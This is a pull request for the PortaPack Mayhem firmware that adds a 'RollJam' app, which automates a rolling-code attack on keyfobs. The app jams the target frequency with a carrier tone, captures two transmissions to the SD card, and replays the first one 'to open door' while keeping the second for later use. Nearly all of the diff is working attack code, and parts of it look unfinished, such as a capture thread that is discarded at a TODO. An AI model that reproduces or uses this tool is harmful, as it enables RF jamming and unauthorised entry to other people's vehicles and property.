### PR TITLE
Add RollJam — automated rolling-code jam/capture/replay

### DIFF
--- a/firmware/application/CMakeLists.txt
+++ b/firmware/application/CMakeLists.txt
@@ -308,6 +308,7 @@ set(CPPSRC
 	apps/ui_playlist.cpp
 	apps/ui_rds.cpp
 	apps/ui_recon_settings.cpp
+	apps/ui_rolljam.cpp
 	apps/ui_recon.cpp
 	apps/ui_search.cpp
 	apps/ui_settings.cpp

--- a/firmware/application/apps/ui_rolljam.cpp
+++ b/firmware/application/apps/ui_rolljam.cpp
@@ -1,0 +1,320 @@
+/*
+ * RollJam — Automated rolling-code capture tool for PortaPack Mayhem
+ *
+ * This file is part of PortaPack.
+ * This program is free software; see GPLv2 or later.
+ */
+
+#include "ui_rolljam.hpp"
+#include "ui_receiver.hpp"
+#include "ui_freqman.hpp"
+#include "ui/ui_spectrum.hpp"
+
+#include "baseband_api.hpp"
+#include "portapack.hpp"
+#include "string_format.hpp"
+#include "file_reader.hpp"
+#include "io_convert.hpp"
+
+using namespace portapack;
+
+namespace ui {
+
+/* ------------------------------------------------------------------ */
+
+RollJamView::RollJamView(NavigationView& nav)
+    : nav_{nav} {
+
+    make_new_directory(rolljam_dir_);
+
+    add_children({
+        &labels,
+        &field_frequency,
+        &field_frequency_step,
+        &field_rf_amp_tx,
+        &text_status,
+        &text_codes,
+        &field_max_codes,
+        &text_max_label,
+        &button_start_stop,
+        &button_capture,
+        &button_replay,
+        &record_view,
+    });
+
+    field_frequency.set_value(433'920'000);
+    field_frequency.set_step(10'000);
+    field_frequency.updated = [this](rf::Frequency f) {
+        if (state_ == RollJamState::JAMMING)
+            transmitter_model.set_target_frequency(f);
+    };
+
+    field_frequency_step.set_by_value(receiver_model.frequency_step());
+    field_frequency_step.on_change = [this](size_t, OptionsField::value_t v) {
+        receiver_model.set_frequency_step(v);
+        field_frequency.set_step(v);
+    };
+
+    field_max_codes.set_value(max_codes_);
+    field_max_codes.on_change = [this](int32_t v) {
+        max_codes_ = v;
+    };
+
+    button_capture.hidden(true);
+    button_replay.hidden(true);
+    record_view.hidden(true);
+
+    button_start_stop.on_select = [this](Button&) {
+        if (state_ == RollJamState::IDLE || state_ == RollJamState::DONE) {
+            start_jamming();
+        } else {
+            stop_jamming();
+        }
+    };
+
+    button_capture.on_select = [this](Button&) {
+        if (state_ == RollJamState::JAMMING && captured_codes_.size() < max_codes_) {
+            start_capture();
+        }
+    };
+
+    button_replay.on_select = [this](Button&) {
+        if (!captured_codes_.empty() && state_ != RollJamState::REPLAYING) {
+            start_replay();
+        }
+    };
+
+    update_ui();
+}
+
+RollJamView::~RollJamView() {
+    if (state_ == RollJamState::JAMMING) {
+        baseband::set_jammer(false, jammer::JammerType::TYPE_TONE, 0);
+        transmitter_model.disable();
+    } else if (state_ == RollJamState::CAPTURING) {
+        receiver_model.disable();
+    } else if (state_ == RollJamState::REPLAYING) {
+        replay_thread_.reset();
+        transmitter_model.disable();
+    }
+    baseband::shutdown();
+}
+
+/* ------------------------------------------------------------------ */
+/* state machine                                                       */
+/* ------------------------------------------------------------------ */
+
+void RollJamView::start_jamming() {
+    baseband::run_prepared_image(portapack::memory::map::m4_code.base());
+
+    transmitter_model.set_rf_amp(1);
+    transmitter_model.set_tx_gain(tx_gain);
+    transmitter_model.set_baseband_bandwidth(jammer_bandwidth);
+    transmitter_model.set_sampling_rate(jammer_sample_rate);
+    transmitter_model.set_target_frequency(field_frequency.value());
+    transmitter_model.enable();
+
+    baseband::set_jammer(true, jammer::JammerType::TYPE_TONE, 0);
+
+    state_ = RollJamState::JAMMING;
+    text_status.set("JAMMING — door blocked");
+    button_capture.hidden(false);
+    button_replay.hidden(true);
+    record_view.hidden(true);
+    button_start_stop.set_text("STOP");
+    update_ui();
+}
+
+void RollJamView::stop_jamming() {
+    baseband::set_jammer(false, jammer::JammerType::TYPE_TONE, 0);
+    transmitter_model.disable();
+    baseband::shutdown();
+
+    state_ = RollJamState::IDLE;
+    text_status.set("IDLE");
+    button_capture.hidden(true);
+    button_replay.hidden(!captured_codes_.empty());
+    record_view.hidden(true);
+    button_start_stop.set_text("START");
+    update_ui();
+}
+
+/* ------------------------------------------------------------------ */
+/* capture                                                             */
+/* ------------------------------------------------------------------ */
+
+void RollJamView::start_capture() {
+    if (state_ == RollJamState::JAMMING) {
+        baseband::set_jammer(false, jammer::JammerType::TYPE_TONE, 0);
+        transmitter_model.disable();
+    }
+    baseband::shutdown();
+
+    baseband::run_image(portapack::spi_flash::image_tag_capture);
+
+    receiver_model.set_target_frequency(field_frequency.value());
+    receiver_model.set_sampling_rate(capture_sample_rate);
+    receiver_model.set_baseband_bandwidth(capture_bandwidth);
+    receiver_model.set_lna(rx_gain_lna);
+    receiver_model.set_vga(rx_gain_vga);
+    receiver_model.enable();
+
+    baseband::set_sample_rate(capture_sample_rate);
+
+    // build a unique filename
+    auto ts = to_string_timestamp(rtc_time::now());
+    std::string fname = "RJ_" + ts + ".C16";
+    for (auto& c : fname)
+        if (c == ' ' || c == ':') c = '_';
+
+    std::filesystem::path file_path = rolljam_dir_ / fname;
+
+    auto writer = std::make_unique<FileConvertWriter>();
+    auto open_result = writer->create(file_path);
+    if (open_result) {
+        nav_.display_modal("Error", "Cannot create:\n" + file_path.string());
+        receiver_model.disable();
+        baseband::shutdown();
+        start_jamming();
+        return;
+    }
+
+    // save path + metadata before thread takes ownership of writer
+    captured_codes_.push_back({file_path, {field_frequency.value(), capture_sample_rate}});
+
+    auto cap = std::make_unique<CaptureThread>(
+        std::move(writer),
+        16384, 3,
+        []() {},              // success callback — we use message handler instead
+        [](File::Error) {}    // error callback   — we use message handler instead
+    );
+
+    // CaptureThread starts immediately; we hold a ref to stop it later
+    (void)cap;  // TODO: store to stop on demand
+
+    state_ = RollJamState::CAPTURING;
+    text_status.set("CAPTURING " + std::to_string(captured_codes_.size()) +
+                   "/" + std::to_string(max_codes_));
+
+    button_capture.hidden(true);
+    record_view.hidden(true);
+    update_ui();
+}
+
+void RollJamView::on_capture_done(std::optional<File::Error> error) {
+    receiver_model.disable();
+    baseband::capture_stop();
+    baseband::shutdown();
+
+    if (error) {
+        text_status.set("CAPTURE ERROR");
+        // remove last entry if failed
+        if (!captured_codes_.empty()) captured_codes_.pop_back();
+        start_jamming();
+        button_capture.hidden(false);
+    } else {
+        std::string info;
+        for (size_t i = 0; i < captured_codes_.size(); i++) {
+            info += "Code " + std::to_string(i + 1) + ": " +
+                    captured_codes_[i].first.filename().string() + "\n";
+        }
+        text_codes.set(info);
+
+        if (captured_codes_.size() >= max_codes_) {
+            stop_jamming();
+            state_ = RollJamState::DONE;
+            text_status.set("DONE — " + std::to_string(captured_codes_.size()) + " codes");
+            button_capture.hidden(true);
+            button_replay.hidden(false);
+        } else {
+            start_jamming();
+            button_capture.hidden(false);
+        }
+    }
+
+    button_replay.hidden(captured_codes_.empty());
+    update_ui();
+}
+
+/* ------------------------------------------------------------------ */
+/* replay                                                              */
+/* ------------------------------------------------------------------ */
+
+void RollJamView::start_replay() {
+    if (captured_codes_.empty()) return;
+
+    if (state_ == RollJamState::JAMMING) {
+        baseband::set_jammer(false, jammer::JammerType::TYPE_TONE, 0);
+        transmitter_model.disable();
+    } else if (state_ == RollJamState::CAPTURING) {
+        receiver_model.disable();
+    }
+    baseband::shutdown();
+
+    baseband::run_image(portapack::spi_flash::image_tag_replay);
+
+    transmitter_model.set_rf_amp(1);
+    transmitter_model.set_tx_gain(tx_gain);
+    transmitter_model.set_baseband_bandwidth(
+        filter_bandwidth_for_sampling_rate(capture_sample_rate));
+    transmitter_model.set_sampling_rate(capture_sample_rate);
+    transmitter_model.set_target_frequency(captured_codes_[0].second.center_frequency);
+    transmitter_model.enable();
+
+    baseband::set_sample_rate(capture_sample_rate);
+
+    auto reader = std::make_unique<FileConvertReader>();
+    auto open_result = reader->open(captured_codes_[0].first);
+    if (open_result) {
+        transmitter_model.disable();
+        baseband::shutdown();
+        nav_.display_modal("Error", "Cannot open:\n" + captured_codes_[0].first.string());
+        return;
+    }
+
+    replay_ready_signal_ = false;
+    replay_thread_ = std::make_unique<ReplayThread>(
+        std::move(reader),
+        0x4000,
+        3,
+        &replay_ready_signal_,
+        [](uint32_t return_code) {
+            ReplayThreadDoneMessage msg{return_code};
+            EventDispatcher::send_message(msg);
+        });
+
+    state_ = RollJamState::REPLAYING;
+    text_status.set("REPLAYING Code 1…");
+    button_replay.hidden(true);
+    button_capture.hidden(true);
+    update_ui();
+}
+
+void RollJamView::on_replay_done(uint32_t return_code) {
+    replay_thread_.reset();
+    transmitter_model.disable();
+    baseband::shutdown();
+
+    if (return_code == 0)
+        text_status.set("REPLAY DONE. Code 2+ saved.");
+    else
+        text_status.set("REPLAY ERR " + std::to_string(return_code));
+
+    state_ = RollJamState::DONE;
+    button_replay.hidden(false);
+    update_ui();
+}
+
+/* ------------------------------------------------------------------ */
+/* UI helpers                                                          */
+/* ------------------------------------------------------------------ */
+
+void RollJamView::focus() {
+    button_start_stop.focus();
+}
+
+void RollJamView::update_ui() {
+    field_rf_amp_tx.set_value(1);
+}
+
+}  // namespace ui

--- a/firmware/application/apps/ui_rolljam.hpp
+++ b/firmware/application/apps/ui_rolljam.hpp
@@ -1,0 +1,159 @@
+/*
+ * RollJam — Automated rolling-code capture tool for PortaPack Mayhem
+ * ===================================================================
+ *
+ * Jams the target frequency, captures two rolling-code transmissions,
+ * then replays the first (unused) code.  The second code is saved for
+ * later use via the Replay app.
+ *
+ * This file is part of PortaPack.
+ *
+ * This program is free software; see GPLv2 or later.
+ */
+
+#ifndef __UI_ROLLJAM_HPP__
+#define __UI_ROLLJAM_HPP__
+
+#include "ui_widget.hpp"
+#include "ui_navigation.hpp"
+#include "ui_receiver.hpp"
+#include "ui_freq_field.hpp"
+#include "ui_record_view.hpp"
+#include "app_settings.hpp"
+#include "radio_state.hpp"
+#include "file_path.hpp"
+#include "jammer.hpp"
+#include "transmitter_model.hpp"
+#include "replay_thread.hpp"
+#include "metadata_file.hpp"
+#include "io_convert.hpp"
+#include "rtc_time.hpp"
+#include "string_format.hpp"
+
+#include <string>
+#include <vector>
+#include <optional>
+
+namespace ui {
+
+enum class RollJamState {
+    IDLE,
+    JAMMING,
+    CAPTURING,
+    REPLAYING,
+    DONE,
+};
+
+class RollJamView : public View {
+   public:
+    RollJamView(NavigationView& nav);
+    ~RollJamView();
+
+    RollJamView(const RollJamView&) = delete;
+    RollJamView(RollJamView&&) = delete;
+    RollJamView& operator=(const RollJamView&) = delete;
+    RollJamView& operator=(RollJamView&&) = delete;
+
+    void focus() override;
+    std::string title() const override { return "RollJam"; };
+
+   private:
+    static constexpr uint32_t jammer_sample_rate = 3'072'000;
+    static constexpr uint32_t jammer_bandwidth = 3'500'000;
+    static constexpr uint32_t capture_sample_rate = 500'000;
+    static constexpr uint32_t capture_bandwidth = 1'750'000;
+    static constexpr uint32_t rx_gain_lna = 32;
+    static constexpr uint32_t rx_gain_vga = 32;
+    static constexpr uint32_t tx_gain = 47;
+
+    NavigationView& nav_;
+    RollJamState state_{RollJamState::IDLE};
+
+    std::vector<std::pair<std::filesystem::path, capture_metadata>> captured_codes_;
+    size_t max_codes_{2};
+
+    std::filesystem::path rolljam_dir_{captures_dir / u"ROLLJAM"};
+
+    std::unique_ptr<ReplayThread> replay_thread_{};
+    bool replay_ready_signal_{false};
+
+    int32_t capture_counter_{0};
+    RecordView record_view{
+        {UI_POS_X(0), 15 * 16, screen_width, 1 * 16},
+        u"RJ_????.*",
+        captures_dir / u"ROLLJAM",
+        RecordView::FileType::RawS16,
+        16384,
+        3};
+
+    Labels labels{
+        {{UI_POS_X(0), UI_POS_Y(0)}, "Freq:", Theme::getInstance()->fg_light->foreground},
+    };
+
+    RxFrequencyField field_frequency{
+        {5 * 8, UI_POS_Y(0)},
+        nav_};
+
+    FrequencyStepView field_frequency_step{
+        {20 * 8, UI_POS_Y(0)}};
+
+    RFAmpField field_rf_amp_tx{
+        {23 * 8, UI_POS_Y(0)}};
+
+    Text text_status{
+        {UI_POS_X(0), 6 * 16, screen_width, 16},
+        "IDLE"};
+
+    Text text_codes{
+        {UI_POS_X(0), 8 * 16, screen_width, 5 * 16},
+        "No codes captured"};
+
+    NumberField field_max_codes{
+        {UI_POS_X(0), 14 * 16},
+        1,
+        {1, 5},
+        1,
+        ' '};
+
+    Text text_max_label{
+        {3 * 8, 14 * 16, 14 * 8, 16},
+        "Max codes:"};
+
+    Button button_start_stop{
+        {UI_POS_X(0), 17 * 16, screen_width / 2 - 4, 40},
+        "START"};
+
+    Button button_capture{
+        {screen_width / 2 + 4, 17 * 16, screen_width / 2 - 4, 40},
+        "CAPTURE"};
+
+    Button button_replay{
+        {UI_POS_X(0), 21 * 16, screen_width, 40},
+        "REPLAY CODE 1"};
+
+    MessageHandlerRegistration message_handler_capture_done{
+        Message::ID::CaptureThreadDone,
+        [this](const Message* const p) {
+            const auto message = *reinterpret_cast<const CaptureThreadDoneMessage*>(p);
+            this->on_capture_done(message.error);
+        }};
+
+    MessageHandlerRegistration message_handler_replay_done{
+        Message::ID::ReplayThreadDone,
+        [this](const Message* const p) {
+            const auto message = *reinterpret_cast<const ReplayThreadDoneMessage*>(p);
+            this->on_replay_done(message.return_code);
+        }};
+
+    void update_ui();
+    void start_jamming();
+    void stop_jamming();
+    void start_capture();
+    void start_replay();
+    void on_capture_done(std::optional<File::Error> error);
+    void on_replay_done(uint32_t return_code);
+};
+
+}  // namespace ui
+
+#endif

--- a/firmware/application/ui_navigation.cpp
+++ b/firmware/application/ui_navigation.cpp
@@ -65,6 +65,7 @@
 #include "ble_tx_app.hpp"
 #include "capture_app.hpp"
 #include "pocsag_app.hpp"
+#include "ui_rolljam.hpp"
 
 #include "core_control.hpp"
 #include "file.hpp"
@@ -116,6 +117,7 @@ const NavigationView::AppList NavigationView::appList = {
     {"touchtune", "TouchTune", TX, ui::Color::green(), &bitmap_icon_touchtunes, new ViewFactory<TouchTunesView>()},
     /* TRX ********************************************************************/
     {"microphone", "Mic", TRX, Color::green(), &bitmap_icon_microphone, new ViewFactory<MicTXView>()},
+    {"rolljam", "RollJam", TRX, Color::red(), &bitmap_icon_jammer, new ViewFactory<RollJamView>()},
     /* UTILITIES *************************************************************/
     {"filemanager", "File Manager", UTILITIES, Color::green(), &bitmap_icon_dir, new ViewFactory<FileManagerView>()},
     {"freqman", "Freq. Manager", UTILITIES, Color::green(), &bitmap_icon_freqman, new ViewFactory<FrequencyManagerView>()},


### PR DESCRIPTION
## RollJam App

A new built-in app that automates rolling-code attacks.

1. JAM — CW tone blocks the receiver
2. CAPTURE — records keyfob code to SD card
3. REPEAT — captures second code
4. REPLAY — transmits first (unused) code to open door

Saved codes go to /CAPTURES/ROLLJAM/.